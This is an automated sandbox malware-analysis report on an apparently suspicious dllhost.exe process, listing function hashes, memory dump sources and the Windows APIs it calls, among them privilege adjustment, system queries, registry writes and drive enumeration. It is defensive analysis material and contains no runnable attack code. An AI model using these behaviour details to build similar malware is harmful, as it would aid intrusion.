Instruction ID: 3d9885f9840b12534d4cbcaf5463a8e1c4622e745eff3e9fbc28cd37bac8eac3
Opcode Fuzzy Hash: 92059ac2f5a226f7da6e6c737f8b79e1906f8e21ffbb5d71bfd25de95404f0bf
Instruction Fuzzy Hash: 1ED05E7CA0C218C7E7104F10EC183ACB260EB82384F0089A1B90DC2180CBBDAE40CF85

Function 04846AD0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6708da40fb5fa82fc72a6bd75746e1301ec2f312345ad7c7617299dc2be0cb
Instruction ID: 6600ecf0def7879d00b930f3183d113e0128fe40999c237b33ee22b1a37213d3
Opcode Fuzzy Hash: 4e6708da40fb5fa82fc72a6bd75746e1301ec2f312345ad7c7617299dc2be0cb
Instruction Fuzzy Hash: ABC0026118D7D95ED35B47701C254643F25890350836A96FF94C8CB9A3C96A844A9726

Function 04910DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122b69792c106caef1cc17d2dcc38ec8fa9a4668fc6c8fbd78c1a36cb6a318bb
Instruction ID: 413569242e7bf75ae724d0d69e87dc916f280dfdfaf79b105c21e97680d35428
Opcode Fuzzy Hash: 122b69792c106caef1cc17d2dcc38ec8fa9a4668fc6c8fbd78c1a36cb6a318bb
Instruction Fuzzy Hash: C9C04C5269F3C10EC713036014540946F2448B711630914DBE08ADE1B2E93989156B51

Function 04846CD8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9b5ff9927be020cf76809a3f02310b5c705cfebf916796944d38a4744d9bd6
Instruction ID: ce31092d9050dbd2b9318c3b4645251ef0c83ba1b5d4396fa54e38a3592bf357
Opcode Fuzzy Hash: fc9b5ff9927be020cf76809a3f02310b5c705cfebf916796944d38a4744d9bd6
Instruction Fuzzy Hash: 65C0020414F3C94FC70397B42D721497FB45D93900B9E45EB8981861A7D54C456A8727

Function 0491098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e2a030a012b2dcc965f9a5bddbae946746263148c467681a2f84096991eb81
Instruction ID: 222ffa139634bad33ff176fed8ae9d60c9d6734a28758cd3efd3ad2cf316ff07
Opcode Fuzzy Hash: 41e2a030a012b2dcc965f9a5bddbae946746263148c467681a2f84096991eb81
Instruction Fuzzy Hash: D7C04C74E052488BEB449FE4C11839C7AA19B56344F5084298006AB394EB7D1444C702

Function 0491057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975a1ea43c9d693e53da42f418b5cf7bc58f7ca90ac4da35a5acdcbeca43e4a9
Instruction ID: 218ba2d7259e9d180def55f8c258fdf917c1a7905a00f657efd01e3d3b27da9b
Opcode Fuzzy Hash: 975a1ea43c9d693e53da42f418b5cf7bc58f7ca90ac4da35a5acdcbeca43e4a9
Instruction Fuzzy Hash: 1FC08C30E0520C8BEB809FF4C01839C3AA19B46300F50842D8002A7380EF3C18448B02

Function 0484F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: e01e6283f110d899050b6d91856b01fac544b4c594f05e30c01b7e840cf88ad1
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 048469A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0484A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5845b72b537a8861c61ad9bb739b349d5ce3b4957fb1774afad230b83b738ef3
Instruction ID: 5e2ae8f42180832eefa2ed163f304cdac8eca637aa67ac5c22e3d770e74d9b91
Opcode Fuzzy Hash: 5845b72b537a8861c61ad9bb739b349d5ce3b4957fb1774afad230b83b738ef3
Instruction Fuzzy Hash: 71A02230000A0C8B028033EC380A22CF32E8CC20083808022A00C80003AFAEB83008AB

Function 04846AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 49aa4bf79cf363648d467bc4076c134cec253beb24bba79472d06a32ecfffeaf
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 0484F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 01281a83952374f01289a3157809b5f3a9a27f352e551f87e5a467ba4cb7e175
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 04910E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991244078.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4910000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573ab960633d88b65d258a8921e65795b17bc8d4e1ecb1ab5cfd790956023827
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 573ab960633d88b65d258a8921e65795b17bc8d4e1ecb1ab5cfd790956023827
Instruction Fuzzy Hash:

Function 0484E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3853759247e2a6eaa2dfbb89cac9a93fd67f112ad0fedefe590ea8813b579734
Instruction ID: 6e773a81938fb3cdfd73b98e7495ab81fe6fddd938cfb0080934c920a0156a85
Opcode Fuzzy Hash: 3853759247e2a6eaa2dfbb89cac9a93fd67f112ad0fedefe590ea8813b579734
Instruction Fuzzy Hash: 2890027514460C8F454027A57909555F75C95455157908052A52D415119F6965204699

Function 0484F840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: fc13b7408798003484d2118497c55230ec7ad3f6f232405e8e7af18ecff9799b
Instruction Fuzzy Hash:

Function 04846C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: e0617799843237f76f26659d7671261444ce636d0cc18629660d2dbc35421b08
Instruction Fuzzy Hash:

Function 0484F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: b91acfbc7404960b0d31da2bd180ddc8589c291044a02a59c2a75c33cc8a4298
Instruction Fuzzy Hash:

Function 0484EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ebf7219672cbfc4cd22a491fcb132c7ace85bee1953cab3a47a6b62c0a0c37
Instruction ID: 03d02495d87246c068057db2d01d5e1fe2285e3e0da17ed635df57ecfef5ab65
Opcode Fuzzy Hash: 97ebf7219672cbfc4cd22a491fcb132c7ace85bee1953cab3a47a6b62c0a0c37
Instruction Fuzzy Hash: EC90223000030C8B08802F80380808C330CC000C223800002A20C000000F28200000CE

Function 0484DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a459f984e831347ce0c7104a98fa6cea03eb70689d18ee634299835be91da2
Instruction ID: 702205d5f6ce572ea3d0beb70e8e509bcfdc3bd007efcc25b50e6cf827497501
Opcode Fuzzy Hash: d6a459f984e831347ce0c7104a98fa6cea03eb70689d18ee634299835be91da2
Instruction Fuzzy Hash: 7090223000020C8B0200238838080A0B30C80000003808002A00C020028B28E8000088

Function 0484F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695a78fbb458b8bf9df317a7f7ced362beddda972545ee9991bab142a8d85b5d
Instruction ID: fa5f4d48f6b795f64375ecfb9dd4f940849d73642e228e61a5fbc18f62b66eb7
Opcode Fuzzy Hash: 695a78fbb458b8bf9df317a7f7ced362beddda972545ee9991bab142a8d85b5d
Instruction Fuzzy Hash: 4390223000020E8B00C02B883808008330C80000003800002A20C000020F082000008E

Function 0484F718 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000025.00000002.1991197780.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_4840000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f8bbcfebf197baa743fe89bd91ad25ab91e40a6dec4393cf5c84ac0283fdc9
Instruction ID: 78a24ee54de588c6940f29d22e79c22282a74f0632238a95fa07df8fed51df7f
Opcode Fuzzy Hash: 83f8bbcfebf197baa743fe89bd91ad25ab91e40a6dec4393cf5c84ac0283fdc9
Instruction Fuzzy Hash:

Analysis Process: dllhost.exePID: 3276, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	6

Executed Functions

Function 0083B32F Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0083B3AF

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 93809239fcec8321903c6714df5985c8744fe49a087cbe39cdb8b0da42e96cd7
Instruction ID: a499123344cc2aeabbf81ba41ed5590892d33b701a26b5256175dcdabb796cb2
Opcode Fuzzy Hash: 93809239fcec8321903c6714df5985c8744fe49a087cbe39cdb8b0da42e96cd7
Instruction Fuzzy Hash: E721D3B55097809FDB228F25DC40B52BFF4EF46310F0884DAE985CB163D331A908DBA1

Function 0083B4B1 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0083B51D

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 92ea5b86197700c6b7a0cbc121f93be14fd96ed31512c1d0f91c170fd5dba219
Instruction ID: f04d81779ab93c940a2d197bcd8f78263910c7b8ae24d9d2e231103d0312f75e
Opcode Fuzzy Hash: 92ea5b86197700c6b7a0cbc121f93be14fd96ed31512c1d0f91c170fd5dba219
Instruction Fuzzy Hash: 381190724097C09FDB228F15DC45A52FFB4FF56324F0980DAE9848B163D265A918DB62

Function 0083B366 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0083B3AF

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4e518d6060d259f9744ef6d7bf183e03d254cf5a393f84d6bd149897521850a8
Instruction ID: 204a60867f05a359abb1e62738944b46ae4b1d05aced67146e0484a962b31de1
Opcode Fuzzy Hash: 4e518d6060d259f9744ef6d7bf183e03d254cf5a393f84d6bd149897521850a8
Instruction Fuzzy Hash: 21119E715046049FEB20CF55D984B56FBE4FF48320F08C8AAEE45CB652D332E814DBA1

Function 0083B4E2 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0083B51D

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: b5f3563b34ac63774cd4a1c1707773c91fd6f73df6c09cd9d3828a3c88b6955a
Instruction ID: 97df9ba10d462572be22ce5b30f21f7e90db3bd7ac89e472afe8bc2946a7f74b
Opcode Fuzzy Hash: b5f3563b34ac63774cd4a1c1707773c91fd6f73df6c09cd9d3828a3c88b6955a
Instruction Fuzzy Hash: B301A2B54046449FEB218F05D945B61FBE0FF58324F08C49ADE458B252D376E818DFA2

Function 04850080 Relevance: 2.6, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04850100
dS|l, xrefs: 048501B9

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: c76a0a1dc36ed24b601cf69af1b1f5683abb57ff2e5bcc5b7381807ae150cf19
Instruction ID: 6155e01539a7ba81cd63dedb5ffc22ce0071dd07c61f79a8b68fa07c6f24a494
Opcode Fuzzy Hash: c76a0a1dc36ed24b601cf69af1b1f5683abb57ff2e5bcc5b7381807ae150cf19
Instruction Fuzzy Hash: 4331867C5006518BD308EF7AEA42659BBE2BFC5308F44C53DD5048B279EFB05629DB82

Function 04850090 Relevance: 2.6, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@Ul, xrefs: 04850100
dS|l, xrefs: 048501B9

Memory Dump Source

Source File: 00000026.00000002.2103001986.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: a209ca14bc211c273bfc3849c565da219d82d4710f5408caff47f3eb2363b146
Instruction ID: f3cd811a29071f47895f5a0e4326a6a769cdb8f0cb352b1d8a60b49783036abb
Opcode Fuzzy Hash: a209ca14bc211c273bfc3849c565da219d82d4710f5408caff47f3eb2363b146
Instruction Fuzzy Hash: 02214F3C5006118BD308EB7AEA42659BAE2BFC5309F44C529C5048B278EFB0562ADB82

Function 04BC0A46 Relevance: 2.5, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5, xrefs: 04BC0A6C
E, xrefs: 04BC0A49

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 5ff65c12385fae175e1826fc36d7b2a18344d6d12b04afca58af7df9a24e285f
Instruction ID: 7c6f5345fab3edea818073591a94ce48dd3207a620ed1185d735fb5414e1100f
Opcode Fuzzy Hash: 5ff65c12385fae175e1826fc36d7b2a18344d6d12b04afca58af7df9a24e285f
Instruction Fuzzy Hash: 52D05E7090624ACFCB419FA0985919C7BB4FF01315B44474E84019E29ADA3D4525DB01

Function 04BC0140 Relevance: 2.5, Strings: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 04BC0144
/, xrefs: 04BC065E

Memory Dump Source

Source File: 00000026.00000002.2112372857.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: 5f8660cf66a40ca61bac4bd7509f3a076b557ed400fb94e255ec73c3e7d818e1
Instruction ID: 264550b77bb9a39ae4077be62ddde10506a99cdf026e32fa608a38be583bb593
Opcode Fuzzy Hash: 5f8660cf66a40ca61bac4bd7509f3a076b557ed400fb94e255ec73c3e7d818e1
Instruction Fuzzy Hash: 84D05B64A06245DBDB41AFE085583687FB5AF01200F4445E9D54AAF2D7E93C54009716

Function 0083A793 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0083A849

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5920af0bdd5600c02f932f34f5e61953e1412353661df9262ef0d7c41806c14f
Instruction ID: 1ab9c59bff7b83852f9eaa817dc1c2eedcd712cc2a785f3cfcce4a8c1d319986
Opcode Fuzzy Hash: 5920af0bdd5600c02f932f34f5e61953e1412353661df9262ef0d7c41806c14f
Instruction Fuzzy Hash: D631A1B55053806FE722CB25CC45B62BFF8EF46314F08849EE9858B252D371A909CBB2

Function 0083B62E Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0083B6D5

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: e9639d9999f179a871fe13c357a8e7282715d9cdd03cda19b3315dd63dbd7aaf
Instruction ID: b7c912697053d7e1ed072300ee67c0e1ad50bb79b37f5e48de57f49365b8450f
Opcode Fuzzy Hash: e9639d9999f179a871fe13c357a8e7282715d9cdd03cda19b3315dd63dbd7aaf
Instruction Fuzzy Hash: 54318FB55093806FE711CB65CC85B66BFF8EF46314F08849AE944CB293E375A909C7A2

Function 0083A120 Relevance: 1.6, APIs: 1, Instructions: 86
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 0083A1C2

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 6ec4a191fbe0c31aa6e84e28a8b5da5ae25c179ee7cb2681e65605b4fc84bd88
Instruction ID: ca1b6a2fc00d0bd5998e0165af3efaf27ffaaf3d776e3da325ac22557bad9e4a
Opcode Fuzzy Hash: 6ec4a191fbe0c31aa6e84e28a8b5da5ae25c179ee7cb2681e65605b4fc84bd88
Instruction Fuzzy Hash: 8031827140D3C06FD3128B258C51BA6BFB4EF47610F0945DBD884CF2A3D229A91AD7B2

Function 0083AF4A Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083AFF0

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8e373c016390c9cb339c1ccd13133931973b96b01ac9112b399c3ade2b41e485
Instruction ID: 0689aa76b468335bed8b8a8e4f9b80f3a8340ba2e9dbaf21d2bf19a1a7b8ab48
Opcode Fuzzy Hash: 8e373c016390c9cb339c1ccd13133931973b96b01ac9112b399c3ade2b41e485
Instruction Fuzzy Hash: 572181B65087405FD722CF11CC44FA7BBF8EF46310F08849AE985CB192D364E908C7A2

Function 0083A8A0 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083A935

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 07351594cc77411f264b5b7414381b1e867ad744c5507afb191ad76ba831ebf1
Instruction ID: b07dd7dc8abf9701727f80c3230baf32e7215b4d6d7d67c8666c237ce0edbbed
Opcode Fuzzy Hash: 07351594cc77411f264b5b7414381b1e867ad744c5507afb191ad76ba831ebf1
Instruction Fuzzy Hash: EF21FBB54097805FE7128B21DC45B66BFACEF47724F0980DAED849B193D2649909C7B2

Function 0083B046 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,E69DB018,00000000,00000000,00000000,00000000), ref: 0083B0DC

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a0895d099ec72a166173aa43c85ab2f1208ad09c0d5dde3e396be8be7aadd5f8
Instruction ID: 22b60f694069c17b398b28681d05df64a7264e94010a2a048f952f71605d53f3
Opcode Fuzzy Hash: a0895d099ec72a166173aa43c85ab2f1208ad09c0d5dde3e396be8be7aadd5f8
Instruction Fuzzy Hash: F82190B65087806FE7228B11CC45F67BFB8EF46310F08849AE985CB252D364E908CBB1

Function 0083A7CA Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0083A849

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dde68e9066a68ad2095b3592a01c7098ce409b5ec6308f9fb9c7c539cf3b82b4
Instruction ID: 78ec2d54b89a7d816325752ff66b3e2a060204672376a627c968c36818fb585b
Opcode Fuzzy Hash: dde68e9066a68ad2095b3592a01c7098ce409b5ec6308f9fb9c7c539cf3b82b4
Instruction Fuzzy Hash: AD21A1B5504200AFEB21CF65CD45B66FBE8FF48314F04886EEA85CB251D371E905CBA2

Function 0083AD1A Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE ref: 0083ADA1

Memory Dump Source

Source File: 00000026.00000002.2073402157.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_83a000_dllhost.jbxd

Similarity

API ID: DrivesLogical
String ID:
API String ID: 999431828-0
